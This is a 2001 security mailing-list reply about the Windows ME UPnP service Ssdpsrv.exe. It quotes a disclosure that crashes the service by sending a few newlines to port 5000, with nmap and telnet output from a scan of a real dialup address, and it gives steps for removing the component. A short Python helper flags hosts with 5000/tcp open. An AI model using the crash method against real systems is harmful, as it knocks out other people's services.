Re: Ssdpsrv.exe in WindowsME

From: Alan Wright (AlanJWright@manx.net)
Date: 10/19/01


Message-Id: <5.1.0.14.0.20011018231914.00aba3c0@mail.manx.net>
Date: Thu, 18 Oct 2001 23:25:00 +0100
To: "milo omega" <mtwoar@hotmail.com>
From: Alan Wright <AlanJWright@manx.net>
Subject: Re: Ssdpsrv.exe in WindowsME

This is a cross post out of general interest to security basics.
Firstly you have to wonder why someone is running this service.
I personally only found out after using a ports traffic analyzer. I will
pass the url for the program on if you want it but do not want to be seen
to plug if against the rules of the forum. :-)

Secondly, Windows Millennium installs the service without telling you that it
has done so when you do a basic install.
Remove it using Control Panel, Add/Remove progs, Windows Setup,
Communications, click on Universal plug and pray, (sic) and then apply.

At 19:46 17/10/2001 -0500, you wrote:
>By connecting to a computer running Ssdpsrv you are able to crash the
>Ssdpsrv server.
>
>Ssdpsrv.exe is the file that starts the UPnP server on WindowsME boxes.
>This service comes standard with the WindowsME installation.
>
>The Ssdpsrv.exe server is started at boot.
>Here is the registry entry:
> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
>Here is the file that starts the server:
> c:\windows\system\ssdpsrv.exe
>
>For information about UPnP go here:
> http://support.microsoft.com/support/kb/articles/Q262/4/58.ASP
>
>Upon running a scan on a computer running the server I get the following:
><snip>
> bash-2.05$ nmap -sT 165.121.234.217
> Starting nmap V. 2.54BETA29 ( www.insecure.org/nmap/ )
> Interesting ports on user-2injqmp.dialup.mindspring.com (165.121.234.217):
> (The 1547 ports scanned but not shown below are in state: closed)
> Port State Service
> 139/tcp open netbios-ssn
> 5000/tcp open fics
> Nmap run completed -- 1 IP address (1 host up) scanned in 14 seconds
></snap>
>
>Method to crash Ssdpsrv:
> Connect to the computer on port 5000.
> Send 3 to 5 newline characters.
> You then get an error and are disconnected.
><snip>
> bash-2.05$ telnet 165.121.234.217 5000
> Trying 165.121.234.217...
> Connected to 165.121.234.217.
> Escape character is '^]'.
>
>
>
> HTTP/1.1 400 Bad Request
>
> Connection closed by foreign host.
> bash-2.05$
></snap>
>
>Here is the error caused by the crash:
> Ssdpsrv has caused an error in MSVCRT.DLL.
> Ssdpsrv will now close.
> If you continue to experience problems,
> try restarting your computer.
>
>This causes the server crash and closes port 5000.
>Either you must restart the server by manually running ssdpsrv.exe
>or reboot.
>
>shouts to pulltheplug #c.
>:o

All the best

Alan

Alan J Wright B.Sc(Hons)(Open)
SMS +47624462772.
Email AlanJWright@manx.net
         foll478trap@yahoo.com

'You're a feisty little one but you'll soon learn respect'

Return of the Jedi
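
Added example, not part of the original message or the quoted post: a small audit helper that reads saved nmap text output, in the style of the scan quoted above, and lists the hosts that still have 5000/tcp open so the UPnP component can be removed from them. The host names, the 192.0.2.x addresses and the function name are constructed for illustration.

```python
import re

UPNP_PORT = 5000  # TCP port the quoted post reports Ssdpsrv listening on

# Section headers: the old style shown in the post and the later nmap style.
HOST_RE = re.compile(r"^(?:Interesting ports on|Nmap scan report for)\s*(.*?):?\s*$")
PORT_RE = re.compile(r"^(\d+)/tcp\s+(\S+)\s+(\S+)")

def hosts_exposing_upnp(nmap_text, port=UPNP_PORT):
    """Return the hosts whose scan section lists port/tcp in state 'open'."""
    flagged, current = [], None
    for raw in nmap_text.splitlines():
        line = raw.strip().lstrip(">").strip()  # tolerate mail-quoted output
        m = HOST_RE.match(line)
        if m:
            current = m.group(1).strip() or None
            continue
        m = PORT_RE.match(line)
        # Match on port number and state only: the service column is a table
        # lookup ("fics" in the post's scan), not proof of what is listening.
        if m and current and int(m.group(1)) == port and m.group(2) == "open":
            if current not in flagged:
                flagged.append(current)
    return flagged

# Constructed sample input (not real scan data).
SAMPLE = """\
Interesting ports on pc-a.example (192.0.2.10):
Port       State       Service
139/tcp    open        netbios-ssn
5000/tcp   open        fics

Interesting ports on pc-b.example (192.0.2.11):
Port       State       Service
139/tcp    open        netbios-ssn

Nmap scan report for 192.0.2.12
PORT     STATE    SERVICE
5000/tcp filtered upnp

Nmap scan report for pc-d.example (192.0.2.13)
PORT     STATE SERVICE
5000/tcp open  upnp
"""

if __name__ == "__main__":
    for host in hosts_exposing_upnp(SAMPLE):
        print("remove UPnP / filter 5000/tcp on:", host)
```
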


